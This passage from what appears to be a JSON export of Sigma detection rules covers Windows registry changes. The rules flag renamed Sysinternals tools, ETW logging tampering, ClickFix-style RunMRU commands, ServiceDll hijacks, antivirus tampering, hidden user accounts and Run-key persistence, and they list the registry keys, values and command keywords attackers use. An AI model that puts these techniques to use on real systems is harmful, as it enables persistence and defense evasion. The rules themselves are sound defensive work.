    "content": "title: Usage of Renamed Sysinternals Tools - RegistrySet\nid: 8023f872-3f1d-4301-a384-801889917ab4\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\n    - id: f50f3c09-557d-492d-81db-9064a8d4e211\n      type: similar\nstatus: test\ndescription: Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2023-08-17\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\PsExec'\n            - '\\ProcDump'\n            - '\\Handle'\n            - '\\LiveKd'\n            - '\\Process Explorer'\n            - '\\PsLoglist'\n            - '\\PsPasswd'\n            - '\\Active Directory Explorer'\n        TargetObject|endswith: '\\EulaAccepted'\n    filter_main_image_names:\n        Image|endswith:\n            - '\\PsExec.exe'\n            - '\\PsExec64.exe'\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n            - '\\livekd.exe'\n            - '\\livekd64.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\psloglist.exe'\n            - '\\psloglist64.exe'\n            - '\\pspasswd.exe'\n            - '\\pspasswd64.exe'\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n    filter_optional_null:\n        Image: null # Race condition with some logging tools\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml",
    "content": "title: ETW Logging Disabled For rpcrt4.dll\nid: 90f342e1-1aaa-4e43-b092-39fda57ed11e\nstatus: test\ndescription: Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll\nreferences:\n    - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-09\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation'\n        Details:\n            # This is disabled by default for some reason\n            - 'DWORD (0x00000000)' # Off\n            - 'DWORD (0x00000002)' # Off with exceptions\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml",
    "content": "title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry\nid: a7df0e9e-91a5-459a-a003-4cde67c2ff5d\nrelated:\n    - id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\n    This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.\nreferences:\n    - https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf\n    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71\n    - https://www.forensafe.com/blogs/runmrukey.html\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/\nauthor: Ahmed Farouk, Nasreddine Bencherchali\ndate: 2024-11-01\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_key:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    selection_powershell_command:\n        Details|contains:\n            - 'powershell'\n            - 'pwsh'\n    selection_powershell_susp_keywords:\n        Details|contains:\n            - ' -e '\n            - ' -ec '\n            - ' -en '\n            - ' -enc '\n            - ' -enco'\n            - 'ftp'\n            - 'Hidden'\n            - 'http'\n            - 'iex'\n            - 'Invoke-'\n    selection_wmic_command:\n        Details|contains: 'wmic'\n    selection_wmic_susp_keywords:\n        Details|contains:\n            - 'shadowcopy'\n            - 'process call create'\n    condition: selection_key and (all of selection_powershell_* or all of selection_wmic_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml",
    "content": "title: ScreenSaver Registry Key Set\nid: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce\nstatus: test\ndescription: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl\nreferences:\n    - https://twitter.com/VakninHai/status/1517027824984547329\n    - https://twitter.com/pabraeken/status/998627081360695297\n    - https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files\nauthor: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)\ndate: 2022-05-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n    registry:\n        TargetObject|contains: '\\Control Panel\\Desktop\\SCRNSAVE.EXE'\n        Details|endswith: '.scr'\n    filter:\n        Details|contains:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and registry and not filter\nfalsepositives:\n    - Legitimate use of screen saver\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml",
    "content": "title: Potential SentinelOne Shell Context Menu Scan Command Tampering\nid: 6c304b02-06e6-402d-8be4-d5833cdf8198\nstatus: test\ndescription: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.\nreferences:\n    - https://mrd0x.com/sentinelone-persistence-via-menu-context/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-06\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\shell\\SentinelOneScan\\command\\'\n    filter_main_sentinelone_default_scan_binary:\n        Details|startswith:\n            - 'C:\\Program Files\\SentinelOne\\Sentinel Agent'\n            - 'C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent'\n        Details|contains: '\\SentinelScanFromContextMenu.exe'\n    filter_main_sentinelone_binary:\n        Image|endswith:\n            - 'C:\\Program Files\\SentinelOne\\'\n            - 'C:\\Program Files (x86)\\SentinelOne\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml",
    "content": "title: ServiceDll Hijack\nid: 612e47e9-8a59-43a6-b404-f48683f45bd6\nstatus: test\ndescription: |\n    Detects changes to the \"ServiceDLL\" value related to a service in the registry.\n    This is often used as a method of persistence.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time\n    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/\nauthor: frack113\ndate: 2022-02-04\nmodified: 2024-04-03\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\System\\'\n            - 'ControlSet'\n            - '\\Services\\'\n        TargetObject|endswith: '\\Parameters\\ServiceDll'\n    filter_main_printextensionmanager:\n        Details: 'C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll'\n    filter_main_domain_controller:\n        Image: 'C:\\Windows\\system32\\lsass.exe'\n        TargetObject|endswith: '\\Services\\NTDS\\Parameters\\ServiceDll'\n        Details: '%%systemroot%%\\system32\\ntdsa.dll'\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n    filter_optional_safetica:\n        Image|endswith: '\\regsvr32.exe'\n        Details: 'C:\\Windows\\System32\\STAgent.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative scripts\n    - Installation of a service\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml",
    "content": "title: ETW Logging Disabled For SCM\nid: 4f281b83-0200-4b34-bf35-d24687ea57c2\nstatus: test\ndescription: Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)\nreferences:\n    - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-09\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled'\n        Details: 'DWORD (0x00000001)' # Funny (sad) enough, this value is by default 1.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml",
    "content": "title: Registry Explorer Policy Modification\nid: 1c3121ed-041b-4d97-a075-07f54f20fb4a\nstatus: test\ndescription: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-03-18\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_set_1:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu'\n        Details: 'DWORD (0x00000001)'\n    condition: selection_set_1\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_sip_persistence.yml",
    "content": "title: Persistence Via New SIP Provider\nid: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1\nstatus: test\ndescription: Detects when an attacker registers a new SIP provider for persistence and defense evasion\nreferences:\n    - https://persistence-info.github.io/Data/codesigning.html\n    - https://github.com/gtworek/PSBits/tree/master/SIP\n    - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1553.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_root:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\'\n            - '\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType'\n    selection_dll:\n        TargetObject|contains:\n            - '\\Dll'\n            - '\\$DLL'\n    filter:\n        Details:\n            # Add more legitimate SIP providers according to your env\n            - WINTRUST.DLL\n            - mso.dll\n    filter_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n        TargetObject|contains: '\\CryptSIPDll'\n        Details: 'C:\\Windows\\System32\\PsfSip.dll'\n    condition: all of selection_* and not 1 of filter*\nfalsepositives:\n    - Legitimate SIP being registered by the OS or different software.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml",
    "content": "title: Tamper With Sophos AV Registry Keys\nid: 9f4662ac-17ca-43aa-8f12-5d7b989d0101\nstatus: test\ndescription: Detects attempts to tamper with Sophos AV functionality via registry key modification\nreferences:\n    - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled'\n            - '\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled'\n            - '\\Sophos\\SAVService\\TamperProtection\\Enabled'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Some FPs may occur when the feature is disabled by the AV itself; always investigate whether the action was legitimate\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_special_accounts.yml",
    "content": "title: Hiding User Account Via SpecialAccounts Registry Key\nid: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd\nrelated:\n    - id: 8a58209c-7ae6-4027-afb0-307a78e4589a\n      type: obsolete\n    - id: 9ec9fb1b-e059-4489-9642-f270c207923d\n      type: similar\nstatus: test\ndescription: Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide a user account from being listed on the logon screen.\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2022-07-12\nmodified: 2023-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1564.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Create Hidden User in Registry\n      technique: T1564.002\n      atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml",
    "content": "title: Activate Suppression of Windows Security Center Notifications\nid: 0c93308a-3f1b-40a9-b649-57ea1a1c1d63\nstatus: test\ndescription: Detects setting Notification_Suppress to 1 in order to disable Windows Security Center notifications\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress'\n        Details: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml",
    "content": "title: Suspicious Keyboard Layout Load\nid: 34aa0252-6039-40ff-951f-939fd6ce47d8\nstatus: test\ndescription: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only\nreferences:\n    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index\n    - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-12\nmodified: 2023-08-17\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: Sysmon config that monitors \\Keyboard Layout\\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'\ndetection:\n    selection_registry:\n        TargetObject|contains:\n            - '\\Keyboard Layout\\Preload\\'\n            - '\\Keyboard Layout\\Substitutes\\'\n        Details|contains:\n            - 00000429  # Persian (Iran)\n            - 00050429  # Persian (Iran)\n            - 0000042a  # Vietnamese\n    condition: selection_registry\nfalsepositives:\n    - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml",
    "content": "title: Potential PendingFileRenameOperations Tampering\nid: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a\nstatus: test\ndescription: |\n    Detects changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.\nreferences:\n    - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6\n    - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN\n    - https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\n    - https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html\nauthor: frack113\ndate: 2023-01-27\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations'\n    selection_susp_paths:\n        Image|contains: '\\Users\\Public\\'\n            # - '\\AppData\\Local\\Temp\\'  # Commented out as it's used by legitimate installers\n    selection_susp_images:\n        Image|endswith:\n            - '\\reg.exe'\n            - '\\regedit.exe'\n    condition: selection_main and 1 of selection_susp_*\nfalsepositives:\n    - Installers and updaters may set currently in use files for rename or deletion after a reboot.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml",
    "content": "title: Suspicious Printer Driver Empty Manufacturer\nid: e0813366-0407-449a-9869-a2db1119dc41\nstatus: test\ndescription: Detects a suspicious printer driver installation with an empty Manufacturer value\nreferences:\n    - https://twitter.com/SBousseaden/status/1410545674773467140\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-01\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574\n    - cve.2021-1675\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Control\\Print\\Environments\\Windows x64\\Drivers'\n            - '\\Manufacturer'\n        Details: '(Empty)'\n    filter_cutepdf:\n        TargetObject|contains: '\\CutePDF Writer v4.0\\'\n    filter_vnc:\n        TargetObject|contains:\n            - '\\VNC Printer (PS)\\'\n            - '\\VNC Printer (UD)\\'\n    filter_pdf24:\n        TargetObject|contains: '\\Version-3\\PDF24\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml",
    "content": "title: Registry Persistence via Explorer Run Key\nid: b7916c2a-fa2f-4795-9477-32b731f70f11\nstatus: test\ndescription: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2018-07-18\nmodified: 2023-12-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n        Details|contains:\n            - ':\\$Recycle.bin\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml",
    "content": "title: New RUN Key Pointing to Suspicious Folder\nid: 02ee49e2-e294-4d0f-9278-f5b3212fc588\nstatus: experimental\ndescription: Detects suspicious new RUN key element pointing to an executable in a suspicious folder\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2018-08-25\nmodified: 2025-10-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_target:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    selection_suspicious_paths_1:\n        Details|contains:\n            - ':\\Perflogs'\n            - ':\\ProgramData'\n            - ':\\Windows\\Temp'\n            - ':\\Temp'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming'\n            - ':\\$Recycle.bin'\n            - ':\\Users\\Default'\n            - ':\\Users\\public'\n            - '%temp%'\n            - '%tmp%'\n            - '%Public%'\n            - '%AppData%'\n    selection_suspicious_paths_user_1:\n        Details|contains: ':\\Users\\'\n    selection_suspicious_paths_user_2:\n        Details|contains:\n            - '\\Favorites'\n            - '\\Favourites'\n            - '\\Contacts'\n            - '\\Music'\n            - '\\Pictures'\n            - '\\Documents'\n            - '\\Photos'\n    filter_main_windows_update:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n        Image|startswith: 'C:\\Windows\\SoftwareDistribution\\Download\\'\n        Details|contains|all:\n            - 'rundll32.exe '\n            - 'C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32'\n        Details|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Windows\\Temp\\'\n    filter_optional_spotify:\n        Image|endswith:\n            - 'C:\\Program Files\\Spotify\\Spotify.exe'\n            - 'C:\\Program Files (x86)\\Spotify\\Spotify.exe'\n            - '\\AppData\\Roaming\\Spotify\\Spotify.exe'\n        TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify'\n        Details|endswith: 'Spotify.exe --autostart --minimized'\n    condition: selection_target and (selection_suspicious_paths_1 or (all of selection_suspicious_paths_user_* )) and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Software using weird folders for updates\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_runmru_space_character.yml",
    "content": "title: Suspicious Space Characters in RunMRU Registry Path - ClickFix\nid: 7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e\nrelated:\n    - id: 3ae9974a-eb09-4044-8e70-8980a50c12c8\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.\nreferences:\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n    - https://github.com/JohnHammond/recaptcha-phish\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-04\ntags:\n    - attack.execution\n    - attack.t1204.004\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\'\n        Details|contains: '#'\n    selection_space_variation:\n        Details|contains:\n            - '            ' # En Quad (U+2000)\n            - '            ' # Em Quad (U+2001)\n            - '            ' # En Space (U+2002)\n            - '            ' # Em Space (U+2003)\n            - '            ' # Three-Per-Em Space (U+2004)\n            - '            ' # Four-Per-Em Space (U+2005)\n            - '            ' # Six-Per-Em Space (U+2006)\n            - '            ' # Figure Space (U+2007)\n            - '            ' # Punctuation Space (U+2008)\n            - '            ' # Thin Space (U+2009)\n            - '            ' # Hair Space (U+200A)\n            - '            ' # No-Break Space (U+00A0)\n            - '            ' # Normal space\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_service_installed.yml",
    "content": "title: Suspicious Service Installed\nid: f2485272-a156-4773-82d7-1d178bc4905b\nstatus: test\ndescription: |\n  Detects installation of NalDrv or PROCEXP152 services via registry keys to non-System32 folders.\n  Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\nreferences:\n    - https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nauthor: xknow (@xknow_infosec), xorxes (@xor_xes)\ndate: 2019-04-08\nmodified: 2023-08-17\ntags:\n    - attack.t1562.001\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject:\n            - 'HKLM\\System\\CurrentControlSet\\Services\\NalDrv\\ImagePath'\n            - 'HKLM\\System\\CurrentControlSet\\Services\\PROCEXP152\\ImagePath'\n    filter:\n        Image|endswith:\n            # Please add the full paths that you use in your environment to tighten the rule\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n        Details|contains: '\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS'\n    condition: selection and not filter\nfalsepositives:\n    - Other legitimate tools using these service names and drivers. Note - clever attackers may easily bypass this detection by simply renaming the services; therefore this rule is only medium level and should not be relied upon on its own.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_shell_open_keys_modification_patterns.yml",
    "content": "title: Suspicious Shell Open Command Registry Modification\nid: 9e8894c0-0ae0-11ef-9d85-1f2942bec57c\nstatus: experimental\ndescription: |\n    Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence.\n    Generally, modifications to the `*\\shell\\open\\command` registry key can indicate an attempt to change the default action for opening files,\n    and various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/f/water-curse.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1548.002\n    - attack.t1546.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\shell\\open\\command\\'\n        Details|contains:\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Contacts\\'\n            - '\\Music\\'\n            - '\\PerfLogs\\'\n            - '\\Photos\\'\n            - '\\Pictures\\'\n            - '\\Users\\Public\\'\n            - '\\Videos\\'\n            - '\\Windows\\Temp\\'\n            - '%AppData%'\n            - '%LocalAppData%'\n            - '%Temp%'\n            - '%tmp%'\n    condition: selection\nfalsepositives:\n    - Legitimate software installations or updates that modify the shell open command registry keys to these locations.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_typedpaths_space_characters.yml",
